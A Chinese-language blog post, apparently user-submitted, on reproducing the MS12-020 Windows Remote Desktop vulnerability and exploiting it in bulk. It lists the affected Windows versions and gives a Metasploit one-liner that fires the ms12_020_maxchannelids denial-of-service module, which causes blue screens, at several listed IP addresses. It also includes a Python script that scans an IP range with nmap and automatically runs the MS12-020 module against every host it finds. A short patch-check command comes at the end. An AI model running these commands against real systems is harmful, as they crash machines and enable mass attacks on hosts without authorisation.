MS12-020漏洞复现及自动化批量利用

网友投稿 717 2022-10-10


MS12-020漏洞复现及自动化批量利用

漏洞描述

Windows 远程桌面协议漏洞,可执行代码,POC可导致蓝屏。(RDP远程桌面执行代码漏洞)

影响目标

Windows XP sp3 Windows xp sp2 Windows Vista sp2 Windows 7 Windows Server 2003 Windows Server 2008 Windows Server 2008 R2

msfpayload利用

msfconsole use auxiliary/dos/windows/rdp/ms12_020_maxchannelids set rhost run

此pyload仅支持单目标。

通过msfconsole快速启动

msfconsole -x "use auxiliary/dos/windows/rdp/ms12_020_maxchannelids;set rhost 10.129.10.10;run;set rhost 10.129.10.37;run;set rhost 10.129.10.169;run;set rhost 10.129.10.209;run;set rhost 10.129.10.232;run;"

通过bash脚本批量生成检测脚本(nmap-port2ip.py)

#encoding:utf-8 import xml.sax import sys import os class MovieHandler( xml.sax.ContentHandler ): def __init__(self, filterport=None): self.CurrentData = "" self.port=filterport self.data = "" self.datas=[] # 元素开始事件处理 def startElement(self, tag, attributes): self.CurrentData = tag if tag == "address": self.data=attributes["addr"] # 元素结束事件处理 def endElement(self, tag): if self.CurrentData == "address": self.datas.append(self.data) self.data="" self.CurrentData = "" class Gather(object): def __init__(self, filterport=None): # 创建一个 XMLReader self.parser = xml.sax.make_parser() # turn off namepsaces self.parser.setFeature(xml.sax.handler.feature_namespaces, 0) # 重写 ContextHandler self.Handler = MovieHandler(filterport) self.parser.setContentHandler( self.Handler ) def run(self, port): self.Handler.datas=[] self.parser.parse(port+".xml") print(self.Handler.datas) def get_ans(self): return self.Handler.datas if __name__ == "__main__": if len(sys.argv) !=3: os.exit() os.system("nmap "+sys.argv[1]+" -p "+sys.argv[2]+" --open -oX "+sys.argv[2]+".xml") g = Gather() g.run(sys.argv[2]) # create cmd cmd = '"use auxiliary/scanner/rdp/ms12_020_check;set threads 20;' ips = g.get_ans() if len(ips)>0: for ip in g.get_ans(): cmd += "set rhosts "+ip+";run;" cmd += 'exit;"' os.system("msfconsole -x " + cmd) # 使用方法 python nmap-port2ip.py # 功能:针对某种服务的漏洞对指定IP段的所有主机进行检测,获取可能存在问题的主机IP,并调用对应的Msf Payload进行利用尝试。 # ip可支持单一IP、CIDR形式IP、10.129.1.1-154等几种,格式与nmap一致 # port仅支持单端口

漏洞补丁检测

systeminfo | find /i "KB2621440" 如果存在结果如下,证明已打补丁,否则,需要打对应的补丁。

参考文章

微软MS12-020


版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。

上一篇:CVE-2018-8120 Win7 2008提权漏洞(cve-2018-8011)
下一篇:java Scanner类的使用示例代码
相关文章

 发表评论

暂时没有评论,来抢沙发吧~